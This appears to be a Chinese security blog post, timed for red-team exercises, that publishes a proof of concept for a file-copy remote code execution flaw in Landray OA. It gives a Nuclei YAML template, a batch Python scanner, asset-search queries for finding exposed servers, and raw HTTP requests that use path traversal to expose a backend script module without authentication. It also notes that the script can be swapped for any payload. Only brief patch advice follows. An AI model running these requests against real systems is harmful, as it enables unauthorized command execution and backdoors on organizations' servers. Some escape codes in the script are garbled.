POC（Yaml&Python）

今天想必各位师傅都已各就各位，原神，启动！接下来本公众号将持续在HVV期间第一时间更新最新的0day/1day的POC信息，欢迎各位师傅动动小手点个关注。

话不多说先上POC（Yam-poc由yakit或ProjectDiscovery Cloud Platform生成，Python-poc脚本由chatgpt生成，准确性请自测，如您觉得有用，请动动小手点个关注，为您每天更新最新漏洞POC）

• 「Yaml」

id: Landray-OA-filecopy-rce

info:
name: 蓝凌OA 文件Copy导致远程代码执行
author: god
severity: high
description: 蓝凌OA 文件Copy导致远程代码执行
metadata:
fofa-query: app="FE-协作平台"
tags: rce,Landray,oa

http:
- raw:
- |
@timeout: 30s
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: {{Hostname}}
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 393

------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
- |+
@timeout: 30s
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length: 69

s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200'
- 'contains(body_2, "dataList")'
condition: and

• 「Python」

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import random
import string
import time
from urllib3.exceptions import InsecureRequestWarning

RED = '�33[91m'
RESET = '�33[0m'
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

headers_1 = {
'Accept': 'application/json,text/javascript,*/*;q=0.01',
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Connection': 'close',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51',
'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest'
}

data_1 = """------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--"""

headers_2 = {
'User-Agent': 'Mozilla/5.0(Macintosh;IntelMacOSX10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'
}

data_2 = 's_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test'

def check_vulnerability(url):
try:
# 第一个请求
attack_url_1 = f"{url.rstrip('/')}/sys/ui/sys_ui_component/sysUiComponent.do"
response_1 = requests.post(attack_url_1, data=data_1, headers=headers_1, verify=False, timeout=30)

# 第二个请求
attack_url_2 = f"{url.rstrip('/')}/resource/help/km/review/dataxml.jsp"
response_2 = requests.post(attack_url_2, data=data_2, headers=headers_2, verify=False, timeout=30)

if 'dataList' in response_2.text:
print(f"{RED}URL [{url}] 可能存在蓝凌 OA 文件 Copy 远程代码执行漏洞{RESET}")
else:
print(f"URL [{url}] 可能不存在漏洞")

except requests.RequestException as e:
print(f"URL [{url}] 请求失败: {e}")
return

def main():
parser = argparse.ArgumentParser(description='检测目标地址是否存在蓝凌 OA 文件 Copy 远程代码执行漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

args = parser.parse_args()

if args.url:
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
elif args.file:
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)

if __name__ == '__main__':
main()

漏洞介绍

❝

蓝凌OA平台，数字化向纵深发展，正加速构建产业互联网，对企业协作能力提出更高要求，蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化，赋能大中型组织的内外协作与管理，支撑商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷问题，攻击者可以利用文件复制的方式，将后台脚本功能模块文件复制到无需权限认证的目录下，导致未经过身份认证的攻击者利用后台脚本执行模块，远程命令执行，写入后门文件并获取服务器权限。

❞

资产测绘

• 「Fofa」

❝

app="Landray-OA系统"

❞

• 「Hunter」

❝

app.name="Landray 蓝凌OA"

❞

• 「Quake」

❝

app="蓝凌OA系统"

❞

漏洞复现

「1、构造数据包」

POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: ip
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395

------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--

「2、上传」

POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host: ip
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
Connection:close
Content-Length:17392
Content-Type:application/x-www-form-urlencoded

s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

返回如下信息代表文件上传成功了，可以替换执行的script为payload即可

修复方案

❝

• 官方已发布安全补丁，建议联系厂商打补丁或升级版本。
• 引入Web应用防火墙防护，配置接口拦截策略。

❞